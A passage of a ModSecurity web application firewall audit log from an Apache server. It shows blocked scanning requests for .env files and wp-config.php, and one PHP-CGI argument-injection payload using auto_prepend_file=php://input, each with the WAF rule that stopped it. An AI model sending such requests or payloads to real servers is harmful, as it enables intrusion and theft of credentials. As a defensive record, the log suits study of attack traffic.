Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c01d0479-Z-- --b364423e-A-- [16/Apr/2025:21:48:21 +0700] Z__DNSpe92T0H9-Aa0xWgwAAAEI 103.236.140.4 53472 103.236.140.4 8181 --b364423e-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.90.228.79 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b364423e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b364423e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744814901489327 799 (- - -) Stopwatch2: 1744814901489327 799; combined=316, p1=273, p2=0, p3=0, p4=0, p5=43, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b364423e-Z-- --d354e362-A-- [16/Apr/2025:22:36:26 +0700] Z__Oehk9XPLR9cFiTEuJeAAAABE 103.236.140.4 38352 103.236.140.4 8181 --d354e362-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.63.18 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.63.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d354e362-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d354e362-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744817786097864 950 (- - -) Stopwatch2: 1744817786097864 950; combined=435, p1=395, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d354e362-Z-- --a298c636-A-- [16/Apr/2025:22:53:12 +0700] Z__SaJVnVduWmh0dMDPJEQAAAJE 103.236.140.4 46104 103.236.140.4 8181 --a298c636-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-AL00 Build/HUAWEICLT-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/9069 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --a298c636-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a298c636-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744818792511012 695 (- - -) Stopwatch2: 1744818792511012 695; combined=311, p1=270, p2=0, p3=0, p4=0, p5=41, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a298c636-Z-- --9356a67f-A-- [17/Apr/2025:00:19:22 +0700] Z__mmipe92T0H9-Aa0yoZAAAAFc 103.236.140.4 43676 103.236.140.4 8181 --9356a67f-B-- GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.233.255.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.233.255.197 X-Forwarded-Proto: http Connection: close --9356a67f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9356a67f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744823962313878 2177 (- - -) Stopwatch2: 1744823962313878 2177; combined=792, p1=360, p2=405, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9356a67f-Z-- --6434d975-A-- [17/Apr/2025:00:19:35 +0700] Z__mpxk9XPLR9cFiTEvCQwAAAAA 103.236.140.4 44058 103.236.140.4 8181 --6434d975-B-- GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0 Host: ns1.dwitekno.co.id X-Real-IP: 103.233.255.197 X-Forwarded-Host: ns1.dwitekno.co.id X-Forwarded-Server: ns1.dwitekno.co.id X-Forwarded-For: 103.233.255.197 X-Forwarded-Proto: https Connection: close --6434d975-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6434d975-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||ns1.dwitekno.co.id|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744823975668803 2481 (- - -) Stopwatch2: 1744823975668803 2481; combined=897, p1=449, p2=415, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6434d975-Z-- --b8ebf215-A-- [17/Apr/2025:01:01:10 +0700] Z__wZhk9XPLR9cFiTEvYzAAAABQ 103.236.140.4 33338 103.236.140.4 8181 --b8ebf215-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 124.115.231.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 124.115.231.142 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b8ebf215-C-- --b8ebf215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8ebf215-E-- --b8ebf215-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744826470070101 7207 (- - -) Stopwatch2: 1744826470070101 7207; combined=5690, p1=517, p2=5148, p3=0, p4=0, p5=25, sr=123, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8ebf215-Z-- --e2acdf73-A-- [17/Apr/2025:03:25:48 +0700] aAASTBk9XPLR9cFiTEs5DgAAAAg 103.236.140.4 43068 103.236.140.4 8181 --e2acdf73-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.105.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.105.139 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e2acdf73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2acdf73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744835148214064 644 (- - -) Stopwatch2: 1744835148214064 644; combined=275, p1=240, p2=0, p3=0, p4=0, p5=34, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2acdf73-Z-- --37925f49-A-- [17/Apr/2025:03:25:53 +0700] aAASUSpe92T0H9-Aa0wbPQAAAFM 103.236.140.4 43252 103.236.140.4 8181 --37925f49-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.105.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.105.139 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --37925f49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37925f49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744835153745849 531 (- - -) Stopwatch2: 1744835153745849 531; combined=209, p1=180, p2=0, p3=0, p4=0, p5=29, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37925f49-Z-- --14a1a047-A-- [17/Apr/2025:04:02:07 +0700] aAAazydHtgGT4CGaO0h8RQAAAFc 103.236.140.4 48982 103.236.140.4 8181 --14a1a047-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.89.103.20 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 159.89.103.20 Accept-Encoding: gzip X-Varnish: 125781277 --14a1a047-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --14a1a047-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744837327026680 773 (- - -) Stopwatch2: 1744837327026680 773; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14a1a047-Z-- --fb93797c-A-- [17/Apr/2025:04:55:21 +0700] aAAnSSdHtgGT4CGaO0h9DwAAAEE 103.236.140.4 49934 103.236.140.4 8181 --fb93797c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 142.93.0.66 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 142.93.0.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --fb93797c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb93797c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744840521380497 685 (- - -) Stopwatch2: 1744840521380497 685; combined=255, p1=219, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb93797c-Z-- --a62d2f34-A-- [17/Apr/2025:05:42:47 +0700] aAAyZydHtgGT4CGaO0h9SAAAAFU 103.236.140.4 50148 103.236.140.4 8181 --a62d2f34-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.206.102 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.206.102 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a62d2f34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a62d2f34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744843367133890 806 (- - -) Stopwatch2: 1744843367133890 806; combined=325, p1=282, p2=0, p3=0, p4=0, p5=42, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a62d2f34-Z-- --036c273a-A-- [17/Apr/2025:07:19:10 +0700] aABI_j2cuLCXMl1vWbD33QAAABM 103.236.140.4 50558 103.236.140.4 8181 --036c273a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/4G Language/zh_CN Accept-Charset: utf-8 --036c273a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --036c273a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744849150293409 878 (- - -) Stopwatch2: 1744849150293409 878; combined=340, p1=298, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --036c273a-Z-- --9e64b00b-A-- [17/Apr/2025:07:19:43 +0700] aABJHydHtgGT4CGaO0h9mQAAAEg 103.236.140.4 50560 103.236.140.4 8181 --9e64b00b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.69.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.69.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3872.0 Safari/537.36 Edg/78.0.244.0 Accept-Charset: utf-8 --9e64b00b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e64b00b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744849183423779 852 (- - -) Stopwatch2: 1744849183423779 852; combined=340, p1=298, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e64b00b-Z-- --1238ac39-A-- [17/Apr/2025:07:39:11 +0700] aABNrydHtgGT4CGaO0h-BQAAAFU 103.236.140.4 52640 103.236.140.4 8181 --1238ac39-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Download Demon/3.5.0.11 Accept-Charset: utf-8 --1238ac39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1238ac39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744850351532848 750 (- - -) Stopwatch2: 1744850351532848 750; combined=306, p1=273, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1238ac39-Z-- --fb2b6d6e-A-- [17/Apr/2025:08:24:38 +0700] aABYVidHtgGT4CGaO0h-zgAAAFc 103.236.140.4 56910 103.236.140.4 8181 --fb2b6d6e-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --fb2b6d6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb2b6d6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853078359651 882 (- - -) Stopwatch2: 1744853078359651 882; combined=380, p1=332, p2=0, p3=0, p4=0, p5=48, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb2b6d6e-Z-- --efc23714-A-- [17/Apr/2025:08:24:40 +0700] aABYWJttSyr0uJld9k4dWwAAANY 103.236.140.4 56912 103.236.140.4 8181 --efc23714-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --efc23714-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efc23714-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853080159538 809 (- - -) Stopwatch2: 1744853080159538 809; combined=328, p1=284, p2=0, p3=0, p4=0, p5=44, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efc23714-Z-- --9078df13-A-- [17/Apr/2025:08:24:41 +0700] aABYWSdHtgGT4CGaO0h-zwAAAFg 103.236.140.4 56914 103.236.140.4 8181 --9078df13-B-- GET /.env.save HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9078df13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9078df13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853081968370 772 (- - -) Stopwatch2: 1744853081968370 772; combined=315, p1=270, p2=0, p3=0, p4=0, p5=45, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9078df13-Z-- --dca35a62-A-- [17/Apr/2025:08:24:43 +0700] aABYWydHtgGT4CGaO0h-0AAAAEI 103.236.140.4 56916 103.236.140.4 8181 --dca35a62-B-- GET /.env.prod HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --dca35a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dca35a62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853083648189 883 (- - -) Stopwatch2: 1744853083648189 883; combined=328, p1=275, p2=0, p3=0, p4=0, p5=53, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dca35a62-Z-- --02d49612-A-- [17/Apr/2025:08:24:57 +0700] aABYaSdHtgGT4CGaO0h-1gAAAEw 103.236.140.4 56934 103.236.140.4 8181 --02d49612-B-- GET /dev/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --02d49612-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02d49612-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744853097453326 759 (- - -) Stopwatch2: 1744853097453326 759; combined=311, p1=278, p2=0, p3=0, p4=0, p5=33, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02d49612-Z-- --922d7a65-A-- [17/Apr/2025:08:24:58 +0700] aABYaidHtgGT4CGaO0h-1wAAAEg 103.236.140.4 56936 103.236.140.4 8181 --922d7a65-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 